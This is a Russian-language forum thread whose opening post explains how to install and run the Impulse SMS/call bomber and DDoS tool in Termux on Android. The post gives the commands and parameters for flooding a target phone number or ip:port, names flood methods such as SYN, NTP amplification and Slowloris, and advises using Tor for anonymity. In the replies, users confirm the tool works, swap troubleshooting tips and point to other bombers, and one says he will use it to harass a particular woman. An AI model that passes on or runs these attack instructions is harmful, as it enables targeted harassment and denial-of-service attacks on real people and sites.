Мощный бомбер на Androd'е (termux)

Статус
В этой теме нельзя размещать новые ответы.

Читатель

Пассажир
Реакции
42
Итак, это краткая статья по установке мощного бомбера на termux. термукс хорош тем, что он нетребовательный ко всему, кроме интернета. его нужно много (если вы не не WiFi/безлимите) и он должен быть быстрым. Итак, прежде распишу что и как. Таких статей я тут не нашел, так-что терпите меня. Подойдет для многого. если для блока телефона для безпрепятственного захода в вк/инстаграм/дноклассники больше подойдет калспамер(callspamer). может позже его разберу.
( она поддерживает 8 разных видов DoS и DDoS атак, таких как: усиление NTP, SYN, TCP SYN, UDP-поток, POD (Ping of Death), Slowloris, Memcached и прочие)
c66a561a4adc932003da1.png

Сам не пользуюсь ничем, кроме спама на телефон. гугл не положишь, а вот сайт с донатами майнкрафта можно с некоторыми усилиями.

это не ПРОФЕССИОНАЛЬНЫЙ способ, но он вполне ХОРОШИЙ и зависит от состояний ИНТЕРНЕТА (ТАК ЧТО ЕСЛИ У ВАС ОТПРАВИЛОСЬ ТОЛЬКО 2 ПОТОКА, ЭТО НЕ ВИНА УТИЛИТЫ!!!). Также замечу, что если телефон совсем помойный (за 2.3к в переходе у Ашота) тоже будет низкая эффективность. а так, любой телефон созданный в 14-13 году и позже очень хорошо справиться с задачами.

Стало интересно, о чем я буду рассказывать? об утилите работающей на
TERMUX.
сам спамер называется Impulse, я сам им пользовался и пользуюсь, ведь его мощь не хуже, а ИНОГДА и лучше многих приватных.
вот фотография выложенная на гитхаб. она почти ничем не отличается от телефонной версии. абсолютно.
Установка:

apt update && apt upgrade

apt install python python2 git

pip install requests

далее клонируем реппозиторий (это место где хранятся файлы)

git clone

cd Impulse

нужно установить зависимость (не наркотическую)

pip install -r requirements.txt

Установили? теперь разберем сам флуд/DDos

python impulse.py --method SMS (вместо смс можно написать CALL) --target [номер телефона] --time 9999 --threads 500

--method SMS
— означает, что мы выбираем flood звонками/sms

--target ххххххххх — вместо ххххххххх номер телефона начиная с 7 или 380 (если вы живете в Украине)

--time 20 — вместо числа 20 можно указать кол-во секунд спама, то есть время проведения спамерской атаки

--threads 2 — цифра 2 представляет собой кол-во потоков, по которым будет проводиться флуд. На самом деле, чем больше, тем лучше. Если поставите больше 50-100, то вашему телефону хана на время проведения атаки

А
х да, совсем забыл..
нужно УСТАНОВИТЬ TOR
Это нужно делать до всех атак и использования утилит. это даст анонимнсть (ip с которого будет запрос будет изменен цепями тор)

Установка TOR
apt update & apt upgrade

pkg install

Вы его установили. теперь его нужно запустить

запуск

tor

если все прошло успешно, то в конце команд(в нижней части терминала) будет написано "boostrapped 100%"

после запускайте все свои зловреды.

ВАЖНО: на этот раз я сам писал статью. нигде ничем не вдохновлялся, а только взял команды из того старенького мануала.

теперь рассмотрим DDos атаки:

python impulse.py --method [в таблице, в ячейке метод] --target [ip]:[port] --time 20 --threads 2

--method [название метода] — Их 8! В таблице ниже указано подробное описание каждого.

--target ip:port — Обычно, в этом пункте надо указывать связку ip:port. Но при использование POD нужно использовать только IP адрес, а при использование HTTP только URL-Адрес.

На этом всё.

не сказать что он мощный, но насолить норм.
Статей таких только по телеграмм каналом типо теневым в день по несколько штук.
Проще на китхабе в поиск вбить sms bomber и там уже выбирать подходящий себе. Из всех тестируемых там лучше всего работают пока только три. Все валяться моментом. А так лучше их все еще дописать своими сервисами.

не сказать что он мощный, но насолить норм.
Статей таких только по телеграмм каналом типо теневым в день по несколько штук.
Проще на китхабе в поиск вбить sms bomber и там уже выбирать подходящий себе. Из всех тестируемых там лучше всего работают пока только три. Все валяться моментом. А так лучше их все еще дописать своими сервисами.
В тг обычно краткое описание и установка. А у меня статья.

Приветствую! На просторах нета докуя мануалов по bomber termux, лично испробовал с 10-ок и они все НЕРАБОЧИЕ, завтра-послезавтра опробуе ваш мануальчик, и тутова отпишу. Спасибо.
P. S работает, да ещё как)) выставил значения time 500 --threads 100 прилетело 85 сообщений, но, так как у меня в трубе стоит блокировка на спам слова, то прошло 8 смс, и какаето хня на запрос кода в телегу стучалась (номер который тэстил на телегу оформлен) Спасибо, тварь теперь одну буду выносить жёстко.

Последнее редактирование:
В тг обычно краткое описание и установка. А у меня статья.
Я не назову это статьей, а просто качественно расписаный гид по импульсу с ТГ, статьей это можно назвать для школьников, чтоб они на преподами поржали.

Приветствую! На просторах нета докуя мануалов по bomber termux, лично испробовал с 10-ок и они все НЕРАБОЧИЕ, завтра-послезавтра опробуе ваш мануальчик, и тутова отпишу. Спасибо.
P. S работает, да ещё как)) выставил значения time 500 --threads 100 прилетело 85 сообщений, но, так как у меня в трубе стоит блокировка на спам слова, то прошло 8 смс, и какаето хня на запрос кода в телегу стучалась (номер который тэстил на телегу оформлен) Спасибо, тварь теперь одну буду выносить жёстко.
Сначало тор используй. Так запрашиваемый ip будет шифрования сетями тор
Сообщение обновлено:

Она была написана мной.
Сообщение обновлено:

Ставь побольше "threads". Прилетит намного больше.

Инструкция не актуальна, он работает на python3. У меня ситуация следующая, сервак на хетзнере, доходит очень не много смс, наверно с десяток. хотя отправлено больше сотни, возможно из за географической привязки подобное? и из за того, что сам сервер крутится на гипервизоре за натом? Поминаю, что скорее всего нет, но спросить все равно стоит.

Не могу запустить, может помочь кто нибудь с этим?

За счет чего шлются эти смс? За счет бесплатных сервисов?

Привет, на каком этапе возникли сложности, автор пошагово всё вроде написал.
Пишет то что нет файлов в директории
Сообщение обновлено:

Сообщение обновлено:

Вложения

• Screenshot_20200907-222538_Termux.jpg
    Screenshot_20200907-222538_Termux.jpg
    522.4 КБ · Просмотры: 43
  • Screenshot_20200907-222525_Termux.jpg
    Screenshot_20200907-222525_Termux.jpg
    432.1 КБ · Просмотры: 42
Кому нужны такие бомберы, берите на гитхабе:
Тбобм
Импульс
Смсхам
Они шлют норм еще. Там даже есть чья то выноска, в которой чел проверяет их на работоспособность.

За счет чего шлются эти смс? За счет бесплатных сервисов?
Да
Сообщение обновлено:

Кому нужны такие бомберы, берите на гитхабе:
Тбобм
Импульс
Смсхам
Они шлют норм еще. Там даже есть чья то выноска, в которой чел проверяет их на работоспособность.
Это и есть импульс

А как же капча? Разве можно слать сотни смс и не вводить капчу?

Что я делаю не так подскажите пожалуйста.

Вложения

• Screenshot_20201008-234529.png
    Screenshot_20201008-234529.png
    164.7 КБ · Просмотры: 30
Что дельше
Что не так
Сообщение обновлено:

Хелп

Вложения

• Screenshot_2020-10-28-19-15-49-461_com.termux.jpg
    Screenshot_2020-10-28-19-15-49-461_com.termux.jpg
    147.9 КБ · Просмотры: 21
Приветствую, один из немногих методов, который ещё работает. Спасибо ещё раз.

Статус
В этой теме нельзя размещать новые ответы.